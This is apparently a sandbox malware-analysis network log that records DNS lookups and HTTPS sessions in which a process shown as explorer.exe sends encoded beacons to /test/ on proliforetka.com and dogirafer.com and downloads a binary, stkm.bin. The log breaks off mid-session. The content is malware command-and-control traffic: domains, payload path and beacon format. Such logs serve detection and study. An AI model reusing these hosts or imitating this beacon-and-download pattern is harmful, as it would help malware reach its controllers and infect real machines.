Dec 17, 2024 17:56:48.225836039 CET | 1.1.1.1 | 192.168.2.6 | 0x5f45 | No error (0) | proliforetka.com |  | 172.67.161.60 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:48.225836039 CET | 1.1.1.1 | 192.168.2.6 | 0x5f45 | No error (0) | proliforetka.com |  | 104.21.41.64 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:56.827999115 CET | 1.1.1.1 | 192.168.2.6 | 0x8d97 | No error (0) | dogirafer.com |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:56.827999115 CET | 1.1.1.1 | 192.168.2.6 | 0x8d97 | No error (0) | dogirafer.com |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:56.827999115 CET | 1.1.1.1 | 192.168.2.6 | 0x8d97 | No error (0) | dogirafer.com |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:56.827999115 CET | 1.1.1.1 | 192.168.2.6 | 0x8d97 | No error (0) | dogirafer.com |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:56.827999115 CET | 1.1.1.1 | 192.168.2.6 | 0x8d97 | No error (0) | dogirafer.com |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:56.827999115 CET | 1.1.1.1 | 192.168.2.6 | 0x8d97 | No error (0) | dogirafer.com |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 17:56:56.827999115 CET | 1.1.1.1 | 192.168.2.6 | 0x8d97 | No error (0) | dogirafer.com |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
                                                                                                                                • proliforetka.com
                                                                                                                                • dogirafer.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49935 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:56:49 UTC | 422 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX1MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 92
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:56:49 UTC | 92 | OUT | Data Ascii: iAY/cs8Z6TKjIJ5g0zlBA3LIhOBdr0PKTx4CxDSYUAyKjsJqQIh3rzl3VF/EeSQ5rFja/bg5V96UeE7yZXOZFUuDhcQ=
2024-12-17 16:56:50 UTC | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:56:50 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YnlY3yKDuuG4SukhLw6B6GlbyfbZyXWk0vi%2F3VWxlOQBd3LnOBVMd9lxiZcN5Cb69PvI0eyNNScjLcp9bZ88cd9sTuLTNLaoIF9TPhFzGN28Y%2Far0bcVNA6HihHNJ8OuoPSL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3872e08f49423b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1583&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1174&delivery_rate=1834170&cwnd=226&unsent_bytes=0&cid=17f39eb77dedf5fe&ts=881&x=0"
2024-12-17 16:56:50 UTC | 94 | IN | Data Ascii: 58mFxnJMpEvVfxLZU6iDFDG3rIiO9Rr0+zFUJahHHfSXPu3pw7SoF7pVRyV0GYL38k8A/T4qxOAezEDEqcEhjrLhTG
2024-12-17 16:56:50 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49942 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:56:52 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:56:53 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:56:53 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EBlmoCYM%2BDJ0pL18MJHrFEozFgoEHSTiS4pottdlbviEoFX78enPNWB%2B5tB0pMsocjt23LBsxZ43Kx4GTMEAg5qlKhRCcApDudYTjRXxSPqctziG86Q%2BZc41L%2FsJHDOTjnW0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3872f3cf9f3a73-FRA
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=92809&min_rtt=92769&rtt_var=34870&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=31365&cwnd=32&unsent_bytes=0&cid=7d00f0fa94bd4346&ts=665&x=0"
2024-12-17 16:56:53 UTC | 54 | IN | Data Ascii: 30m19pJMNLvVfzIpU0gzZHG3HJiO5SrkyzHkRfgnfZDALp5Q==
2024-12-17 16:56:53 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49947 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:56:54 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:56:55 UTC | 815 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:56:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aa2sbxaGkgDxXGOg9emHhuLzlX50GqbyMzSjJnfduvBmLz6Zn%2Fmer%2FJttujscw4qFAxmJ40w1o2Mj3jklY%2BUL%2BFh39ivKFBJoOzpc9cmY%2FFMxNj3cSQA4%2BbqWmmyQeMb9sXR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387300ac865e61-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2467&min_rtt=2448&rtt_var=956&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1122213&cwnd=209&unsent_bytes=0&cid=94e104f5611cb6ca&ts=754&x=0"
2024-12-17 16:56:55 UTC | 427 | IN | Data Ascii: 1a4nV5mIsJJu1fzJpEzhjNCG3vNgOtcrkizGUVajXPbAALp5exDOPARyFkPbnOYLn1t9QHej6lBBoTEB0PZGBDqZyn7j6Wdfg31b7eyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvPQ/TnBIJPP/JV4RWXfkjZ+cioOSSkO9xCyCGEJsNeG54Cw+nEuS4V29/DG7mFk/9YjDPpF6rxOLXKLpVh0JR5L0Va2ESjKlc6NP
2024-12-17 16:56:55 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49959 | 104.21.16.1 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:56:58 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:56:59 UTC | 817 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:56:59 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2BlwlygCdEceJ3pFA05OZ9ZJHgFfOqgustRq%2BVePNdPthGhH%2B7NVTO8%2B6vffskXWCqmXNTLS7bUq9SBYJlyaz4M%2BWj7ph6aTPSCkyuhena%2FGdBsBc9fm5skyR9aaL%2FY9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387314fd910fa8-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=32426&min_rtt=1542&rtt_var=18946&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=1893644&cwnd=252&unsent_bytes=0&cid=fc9de5827ecf3625&ts=1685&x=0"
2024-12-17 16:56:59 UTC | 431 | IN | Data Ascii: 1a8mVtrKMpIuVf8JpUzhjpFG3zDh+1XoEuzG0hbjHbVAgLp5exDOPARyFkPbnOWLnxr8AXSj6ZED4fDB0vZExDjZSn05suafA71Ybr/Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9TfbjDoIjPZVX4BKTMEvTtsKuNkOoPN0txiqObfdhebBDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
2024-12-17 16:56:59 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49965 | 104.21.16.1 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:57:02 UTC | 126 | OUT | GET /files/stkm.bin HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
2024-12-17 16:57:05 UTC | 927 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:05 GMT
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Length: 857600
                                                                                                                                Connection: close
                                                                                                                                Content-Disposition: attachment; filename = stkm.bin
                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                Last-Modified: Tue, 17 Dec 2024 16:57:04 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e81AU5UXAGGTEaFTrENIG5hABL%2FLH9aBKlEhLr6TYhJft1ZBjWV%2BQaPfUTkPbTvLyfCw0W4B8fVKEeE3Upu77gT3HgyUrFo0uvJw64xuE7jnwoTUGN7ZykFB3RNxCu6%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387331a9998ce0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1847&rtt_var=779&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=764&delivery_rate=1580942&cwnd=206&unsent_bytes=0&cid=8a08915f10c330c2&ts=4158&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.6  49978        104.21.16.1     443               4004  C:\Windows\explorer.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-17 16:57:07 UTC  150                OUT        GET /files/stkm.bin HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Connection: Keep-Alive
2024-12-17 16:57:08 UTC  934                IN         HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:08 GMT
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Length: 857600
                                                                                                                                Connection: close
                                                                                                                                Content-Disposition: attachment; filename = stkm.bin
                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 4
                                                                                                                                Last-Modified: Tue, 17 Dec 2024 16:57:04 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QORYQ0bYfPuH%2Bj57eoClKpiUE%2FIDmxv1sX2Iq3CjjQuHQGCFiAVOuDXH5XwHkEdEQelgpUeiKFxMuvAphzGEt2rhqlLfptiLmI2W7obu%2BjEb2IFztgAKACByWF6YjBB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873517c734388-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1578&rtt_var=598&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=764&delivery_rate=1820448&cwnd=221&unsent_bytes=0&cid=02e1df5a220bc362&ts=1855&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.6  49989        104.21.16.1     443               4004  C:\Windows\explorer.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-17 16:57:11 UTC  126                OUT        GET /files/stkm.bin HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
2024-12-17 16:57:11 UTC  942                IN         HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:11 GMT
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Length: 857600
                                                                                                                                Connection: close
                                                                                                                                Content-Disposition: attachment; filename = stkm.bin
                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 7
                                                                                                                                Last-Modified: Tue, 17 Dec 2024 16:57:04 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FyuUuDpmoDVtUCHsS14B%2FVS67YhPILq%2B2%2FAYaUVp6wZxFARwp%2FLgpqDpQn2ETk0RTVgWd9Luu28t%2BdBjQdojRdZuTbC5AymzZFLzX5CEKGcos%2BfD9MSMdsGcr51e%2BSIi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387364fb0541ba-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1668&rtt_var=628&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=764&delivery_rate=1750599&cwnd=192&unsent_bytes=0&cid=33612bd31e4c3ce4&ts=1889&x=0"
                                                                                                                                Data Ascii: \uHH8tHH"uHHH:u3I+IH<H\$Ht$WH HHHv3lHK3HH9uH:":-:/~:9:[:ftZ:nt:ttP:{uHVHAHHH>UH


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49998 | 104.21.16.1 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:57:14 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:57:17 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:17 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctaOJbcsob3oFZ7higDcjSL66JbECQ53Ulsc64v4rOUV%2B%2FDk%2BrdOyoq1iLkHE6vbxcP2AYo%2Fzjuzk%2FrPPZO26XAt6UfR1nfz%2FbHz73VPYC8G4vEUFtnrhRR3UmPY1Ro8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38737c9ef44388-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1627&rtt_var=614&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1052&delivery_rate=1794714&cwnd=221&unsent_bytes=0&cid=71346f40787bcfd1&ts=2690&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49999 | 104.21.16.1 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:57:18 UTC | 416 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXwMtB7wWZOVXnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcAtkDLcBiGr4ixbRT8
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 360
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:57:20 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:20 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fa%2B0l%2B6TbPVXKsa8SxcBLIiqEeVYLxB%2BWH8z1lZFqKX8ouZq%2FVPtFjPKjeqEmQ85vvN2eXqCTI4ldQoQhg3AMBolVe3PapXRgKHJk3YT6XtpCg7VtJFFD%2BE7fUZFCk8A"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38739578f78ce0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1797&rtt_var=678&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1436&delivery_rate=1610590&cwnd=206&unsent_bytes=0&cid=c1a961835311b090&ts=1627&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 50000 | 104.21.16.1 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:57:21 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXzMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:57:23 UTC | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:23 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WBUCsioDDQlpIugY3TPEvT0cmWXadu7BhcPFLj0tz4O%2BY%2BjE%2FL8OJxCx8G1br2lAkh8A03VTmkXDuD4Bl8skZCHYILfBQDxI9vMc9Ad1SWOYfk5InVwNsTR%2BaXmCsIVY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873a92c514388-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=792&sent=8&recv=9&lost=0&retrans=1&sent_bytes=4200&recv_bytes=1052&delivery_rate=43591&cwnd=221&unsent_bytes=0&cid=4eae1456fc015c0f&ts=1735&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 50001 | 104.21.16.1 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:57:24 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXyMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:57:26 UTC | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RErVlxuVNt7Aq7T2p2aHAgwdrqe2k1Wu5v%2BXDAbee4KDDSvnL0Do7J5LTy4VPeWZwVB5pYJJhvu06EMKJkrhvkxM%2BR5BY3zGq5k3CoOhh8gtST6bW4h8i%2FAdbWNJS43L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873bcadc98ce0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=58944&min_rtt=2183&rtt_var=34506&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=1337608&cwnd=206&unsent_bytes=0&cid=a1b50ee34a0c8de7&ts=1647&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 50002 | 104.21.16.1 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:57:27 UTC | 418 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX9MtB7wWZOVG6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: dogirafer.com
                                                                                                                                Content-Length: 12248
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:57:29 UTC | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:29 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Myd5Q8oyvkzIBBeW8itdnWFVOCZloqSz2xha5w5wrh0cCZoto1g2LwbBSTapNtRfGt4dZU%2FlDCgB1YRlCGP98Ov78J2SEXYAAXylHOjlMJuV%2FCEyIqpPsUJKJJ4qNei"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873ce1b6a8ce0-EWR
